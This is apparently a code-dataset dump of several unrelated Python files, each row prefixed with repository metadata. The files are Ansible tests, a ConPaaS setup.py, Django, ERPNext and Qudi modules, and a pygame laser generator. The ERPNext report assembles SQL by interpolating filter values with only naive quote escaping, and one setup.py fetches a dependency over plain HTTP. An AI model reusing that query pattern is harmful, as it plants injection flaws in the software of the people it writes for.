results = json.loads(out)
assert results['failed']
assert results['msg'] == "parameters are mutually exclusive: bar, bam"
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bam': 'bad2'}], indirect=['stdin'])
def test_fail_required_together(self, capfd, stdin, complex_argspec):
"""Fail because only one of a required_together pair of parameters was specified"""
with pytest.raises(SystemExit):
am = basic.AnsibleModule(**complex_argspec)
out, err = capfd.readouterr()
results = json.loads(out)
assert results['failed']
assert results['msg'] == "parameters are required together: bam, baz"
@pytest.mark.parametrize('stdin', [{'foo': 'hello', 'bar': 'hi'}], indirect=['stdin'])
def test_fail_required_together_and_default(self, capfd, stdin, complex_argspec):
"""Fail because one of a required_together pair of parameters has a default and the other was not specified"""
complex_argspec['argument_spec']['baz'] = {'default': 42}
with pytest.raises(SystemExit):
am = basic.AnsibleModule(**complex_argspec)
out, err |
ConPaaS-team/conpaas | conpaas-client/setup.py | Python | bsd-3-clause | 705 | 0.005674 | #!/usr/bin/env python
from setuptools import setup

# Client version; also pins the matching cpslib tarball below.
CPSVERSION = '204'

long_description = """
ConPaaS: an integrated runtime environment for elastic Cloud applications
=========================================================================
"""

setup(name='cpsclient',
      version=CPSVERSION,
      description='ConPaaS command line client',
      author='ConPaaS team',
      author_email='info@conpaas.eu',
      url='http://www.conpaas.eu/',
      download_url='http://www.conpaas.eu/download/',
      license='BSD',
      packages=['cps',],
      scripts=['cpsclient.py'],
      install_requires=['cpslib'],
      # cpslib is fetched from the project site at the matching version.
      dependency_links=[ 'http://www.conpaas.eu/dl/cpslib-%s.tar.gz' % CPSVERSION, ],)
|
appsembler/mayan_appsembler | apps/dynamic_search/models.py | Python | gpl-3.0 | 2,130 | 0.001878 | from __future__ import absolute_import
import urlparse
import urllib
from datetime import datetime
from django.db import models
from django.utils.translation import ugettext as _
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.encoding import smart_unicode, smart_str
from .managers import RecentSearchManager
from .classes import SearchModel
class RecentSearch(models.Model):
    """
    Keeps a list of the n most recent search keywords for a given user.

    (``__unicode__`` reconstructed: the original text was corrupted by stray
    dataset column separators.)
    """
    user = models.ForeignKey(User, verbose_name=_(u'user'), editable=False)
    query = models.TextField(verbose_name=_(u'query'), editable=False)
    datetime_created = models.DateTimeField(verbose_name=_(u'datetime created'), editable=False)
    hits = models.IntegerField(verbose_name=_(u'hits'), editable=False)

    objects = RecentSearchManager()

    def __unicode__(self):
        """Human-readable rendering of the stored query string plus hit count."""
        document_search = SearchModel.get('documents.Document')
        query_dict = urlparse.parse_qs(urllib.unquote_plus(smart_str(self.query)))
        if self.is_advanced():
            # Advanced search: render every field as "<label>: <terms>"
            advanced_string = []
            for key, value in query_dict.items():
                search_field = document_search.get_search_field(key)
                advanced_string.append(u'%s: %s' % (search_field.label, smart_unicode(' '.join(value))))
            display_string = u', '.join(advanced_string)
        else:
            # Simple search: the terms live under the 'q' key
            display_string = smart_unicode(' '.join(query_dict['q']))
        return u'%s (%s)' % (display_string, self.hits)

    def save(self, *args, **kwargs):
        # Stamp the creation time on every save.
        self.datetime_created = datetime.now()
        super(RecentSearch, self).save(*args, **kwargs)

    def url(self):
        """URL that re-runs this search (advanced vs. simple view)."""
        view = 'results' if self.is_advanced() else 'search'
        return '%s?%s' % (reverse(view), self.query)

    def is_advanced(self):
        # Simple searches always carry a 'q' key; anything else is advanced.
        return 'q' not in urlparse.parse_qs(self.query)

    class Meta:
        ordering = ('-datetime_created',)
        verbose_name = _(u'recent search')
        verbose_name_plural = _(u'recent searches')
|
mhbu50/erpnext | erpnext/hr/report/employee_birthday/employee_birthday.py | Python | gpl-3.0 | 1,261 | 0.025377 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
import frappe
from frappe import _
def execute(filters=None):
    """Report entry point: return (columns, rows) for the given filters."""
    filters = filters or {}
    return get_columns(), get_employees(filters)
def get_columns():
    """Return the report column definitions in Frappe's
    "Label:Fieldtype/Options:Width" string format."""
    return [
        _("Employee") + ":Link/Employee:120", _("Name") + ":Data:200", _("Date of Birth")+ ":Date:100",
        _("Branch") + ":Link/Branch:120", _("Department") + ":Link/Department:120",
        _("Designation") + ":Link/Designation:120", _("Gender") + "::60", _("Company") + ":Link/Company:120"
    ]
def get_employees(filters):
    """Return active employees matching the filters as a list of rows.

    NOTE(review): `conditions` is string-interpolated into the SQL (see
    get_conditions); values are only naively quote-escaped rather than
    parameterized.
    """
    conditions = get_conditions(filters)
    return frappe.db.sql("""select name, employee_name, date_of_birth,
	branch, department, designation,
	gender, company from tabEmployee where status = 'Active' %s""" % conditions, as_list=1)
def get_conditions(filters):
    """Build the SQL WHERE-clause fragment for the report filters.

    Returns '' when no filters apply, otherwise a string of
    " and <condition>" clauses to append after the base WHERE.

    (Reconstructed: the original text was corrupted by stray dataset
    column separators.)

    NOTE(review): the company value is inserted with only naive quote
    escaping; a parameterized query upstream would be safer.
    """
    months = ["Jan", "Feb", "Mar", "Apr", "May", "Jun",
              "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"]
    conditions = ""
    if filters.get("month"):
        # 1-based month number derived from the abbreviated month name.
        month = months.index(filters["month"]) + 1
        conditions += " and month(date_of_birth) = '%s'" % month
    if filters.get("company"):
        conditions += " and company = '%s'" % \
            filters["company"].replace("'", "\\'")
    return conditions
|
drogenlied/qudi | qtwidgets/plotwidget_modified.py | Python | gpl-3.0 | 3,362 | 0.001785 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
This file contains the modified PlotWidget for Qudi.
Qudi is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Qudi is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Qudi. If not, see <http://www.gnu.org/licenses/>.
Copyright (c) the Qudi Developers. See the COPYRIGHT.txt file at the
top-level directory of this distribution and at <https://github.com/Ulm-IQO/qudi/>
"""
from pyqtgraph import PlotWidget
from qtpy import QtCore
from qtpy import QtWidgets
class PlotWidgetModified(PlotWidget):
    """ Extend the PlotWidget Class with more adjustment possibilities.

    This class can be promoted in the Qt designer. Here you can predefine or
    redefined all methods and class variables, which should be used in the
    Qt Designer before it will be loaded into the created ui file.

    This class behaves like the normal PlotWidget class but extends its
    functionality with modified mouse events: it re-emits press and release
    events via Qt signals so other objects can react to clicks inside the plot.
    """

    # Emitted with the QMouseEvent on every mouse press / release in the widget.
    sigMouseClick = QtCore.Signal(object)
    sigMouseReleased = QtCore.Signal(object)

    def __init__(self, *args, **kargs):
        # NOTE(review): *args is accepted but silently dropped — only **kargs
        # is forwarded to PlotWidget; confirm whether positional args matter.
        PlotWidget.__init__(self,**kargs)

    def mousePressEvent(self, ev):
        """ Override the Qt method, which handles mouse press events.

        @param QEvent ev: Event object which contains all the information at
                          the time the event was emitted.

        That is basically a reimplementation of the mousePressEvent function
        of the PlotWidget.
        """
        # Extend the received event ev with all the properties of a Qt mouse
        # press event (let the base graphics view process it first).
        QtWidgets.QGraphicsView.mousePressEvent(self, ev)

        # this signal will be caught by other methods if the mouse was clicked
        # inside the PlotWidget.
        self.sigMouseClick.emit(ev)

        if not self.mouseEnabled:
            return
        # Remember where the press happened and whether the scene accepted it.
        self.mousePressPos = ev.pos()
        self.clickAccepted = ev.isAccepted()
        if not self.clickAccepted:
            self.scene().clearSelection()
        return   ## Everything below disabled for now.

    def mouseReleaseEvent(self, ev):
        """ Override the Qt method, which handles mouse release events.

        @param QEvent ev: Event object which contains all the information at
                          the time the event was emitted.

        That is basically a reimplementation of the mouseReleaseEvent function
        of the PlotWidget.
        """
        # Extend the received event ev with all the properties of a Qt mouse
        # press event (base class handling first).
        QtWidgets.QGraphicsView.mouseReleaseEvent(self, ev)

        # this signal will be caught by other methods if the mouse was clicked
        # and afterwards released inside the PlotWidget.
        self.sigMouseReleased.emit(ev)

        if not self.mouseEnabled:
            return
        # Record which button ended the click.
        self.lastButtonReleased = ev.button()
        return   ## Everything below disabled for now.
|
autostack/pytest-ansible | pytest_ansible/node.py | Python | mit | 1,681 | 0 | #!/usr/bin/env python
# -*- coding: UTF-8 -*-
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from pytest_ansible.utils import memoize
import threading
import os
class Facts(dict):
    """Dict of Ansible facts that also allows attribute access.

    Attribute lookup falls back to the ``ansible_``-prefixed key, so
    ``facts.os_family`` resolves to ``facts['ansible_os_family']``.
    Nested dict values are wrapped in :class:`Facts` so chained attribute
    access keeps working.
    """

    PREF = 'ansible_'

    def __getattr__(self, attr):
        try:
            data = self[attr]
        except KeyError:
            if attr.startswith(self.PREF):
                # Fix: raise AttributeError (not KeyError) for a missing
                # attribute so hasattr()/getattr(obj, name, default) behave
                # correctly.
                raise AttributeError(attr)
            # Retry with the 'ansible_' prefix prepended.
            attr = '{}{}'.format(self.PREF, attr)
            data = getattr(self, attr)
        if isinstance(data, dict):
            data = Facts(data)
        return data
class Node(object):
    """Wrapper around a single inventory host, exposing its name, inventory
    variables and the facts gathered by Ansible's 'setup' module."""

    def __init__(self, name, inventory):
        self._name = name
        self._inventory = inventory
        self._facts = None

    def __repr__(self):
        repr_template = ("<{0.__class__.__module__}.{0.__class__.__name__}"
                         " object at {1} | name {2}>")
        return repr_template.format(self, hex(id(self)), self.name)

    def _load_setup(self, data):
        """Cache the facts from a 'setup' module result dict.

        Fix: removed a leftover debug print of the current thread id / pid.
        """
        self._facts = Facts(data['ansible_facts'])

    @property
    def facts(self):
        """Facts loaded by _load_setup(), or None before setup ran."""
        return self._facts

    @property
    def vars(self):
        """Host variables looked up from the inventory."""
        return self.inventory.get_host(self._name).vars

    @property
    def name(self):
        """The host name this node wraps."""
        return self._name

    @property
    def inventory(self):
        """The inventory manager instance this node belongs to."""
        return self._inventory
@memoize
def get_node(name, inventory):
    '''
    Generating Node object based on a given ansible host name; memoized so
    repeated calls with the same arguments return the same Node instance.

    :param name: host name
    :param inventory: inventory manager instance
    :return: Node()
    '''
    return Node(name, inventory)
|
171121130/SWI | venv/Lib/site-packages/openpyxl/cell/__init__.py | Python | mit | 149 | 0 | from __future__ import absolute_import
# | Copyright (c) 2010-2017 openpyxl
from .cell import Cell, WriteOnlyCell
from .read_only import ReadOnlyCell
| |
Penaz91/Glitch_Heaven | Game/libs/lasergen.py | Python | mit | 1,000 | 0.002 | # Laser Generator Library
# Part of the Glitch_Heaven Project
# Copyright 2015-2016 Penaz <penazarea@altervista.org>
import pygame
from os.path import join as pjoin
def generate(size, vertical=False, image=None):
    """Build a laser-strip surface of the given pixel length.

    The 32px laser tile (loaded from resources unless `image` is given) is
    repeated every 32 pixels along the strip; for vertical strips the tile
    is rotated 90 degrees first. Returns the assembled alpha surface.
    """
    if image is None:
        tile = pygame.image.load(pjoin("resources", "sprites", "laser.png")).convert_alpha()
    else:
        tile = image
    if vertical:
        tile = pygame.transform.rotate(tile, 90)
        strip = pygame.surface.Surface((32, size), pygame.SRCALPHA, 32)
        positions = ((0, offset) for offset in range(0, size, 32))
    else:
        strip = pygame.surface.Surface((size, 32), pygame.SRCALPHA, 32)
        positions = ((offset, 0) for offset in range(0, size, 32))
    for position in positions:
        strip.blit(tile, position)
    return strip.convert_alpha()
if __name__ == "__main__":
    # Manual smoke test: open a window and draw a vertical 160px laser strip.
    pygame.init()
    screen = pygame.display.set_mode((800, 600))
    platform = generate(160, True)
    while True:
        # NOTE(review): no pygame.event handling in this loop, so the window
        # may be reported unresponsive by the OS; acceptable for a throwaway
        # visual check only.
        screen.blit(platform, (50, 50))
        pygame.display.update()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.